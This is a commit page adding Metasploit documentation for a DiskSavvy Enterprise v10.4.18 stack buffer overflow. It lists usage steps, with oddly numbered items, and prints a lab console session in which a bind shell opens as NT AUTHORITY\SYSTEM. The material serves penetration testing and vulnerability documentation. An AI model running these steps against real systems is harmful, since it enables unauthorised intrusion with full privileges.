Skip to content

Commit 07763cc

Browse files
Disk Savvy Server Buffer Overflow Documentation
1 parent d5ab7b1 commit 07763cc

File tree

1 file changed

+39
-0
lines changed

1 file changed

+39
-0
lines changed
Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
## Vulnerable Application
2+
3+
[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
4+
5+
## Verification Steps
6+
1. Install a vulnerable DiskSavvy Enterprise
7+
6. Start `msfconsole`
8+
3. Do `exploit/windows/misc/disk_savvy_adm`
9+
4. Do `set RHOST ip`
10+
5. Do `set PAYLOAD windows/shell/bind_tcp`
11+
13. Do `exploit`
12+
7. Enjoy you shell
13+
14+
## Scenarios
15+
16+
###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
17+
18+
```
19+
msf > use exploit/windows/misc/disk_savvy_adm
20+
msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
21+
RHOST => 192.168.216.55
22+
msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
23+
payload => windows/shell/bind_tcp
24+
msf exploit(windows/misc/disk_savvy_adm) > exploit
25+
26+
[*] Started bind handler
27+
[*] Encoded stage with x86/shikata_ga_nai
28+
[*] Sending encoded stage (267 bytes) to 192.168.216.55
29+
[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
30+
31+
Microsoft Windows [Version 6.1.7601]
32+
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
33+
34+
C:\Windows\system32>whoami
35+
whoami
36+
nt authority\system
37+
38+
C:\Windows\system32>
39+
```

0 commit comments

Comments
 (0)